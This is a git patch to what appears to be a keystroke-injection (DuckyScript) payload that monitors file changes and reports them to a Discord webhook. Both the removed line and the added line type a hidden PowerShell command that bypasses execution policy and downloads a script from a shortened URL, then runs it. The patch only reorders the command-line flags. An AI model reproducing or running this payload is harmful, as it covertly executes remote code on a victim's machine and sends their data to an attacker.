From 40d9c61b57f7c2981acf572a1a32c8524c68eca5 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Fri, 29 Dec 2023 22:30:48 +0000 Subject: [PATCH] Update File-Changes-to-Discord.txt --- File-Monitor-to-Discord/File-Changes-to-Discord.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/File-Monitor-to-Discord/File-Changes-to-Discord.txt b/File-Monitor-to-Discord/File-Changes-to-Discord.txt index 831da7b..b18f61e 100644 --- a/File-Monitor-to-Discord/File-Changes-to-Discord.txt +++ b/File-Monitor-to-Discord/File-Changes-to-Discord.txt @@ -14,7 +14,7 @@ REM open powershell (remove -W Hidden to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_fm_to_dc | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_fm_to_dc | iex ENTER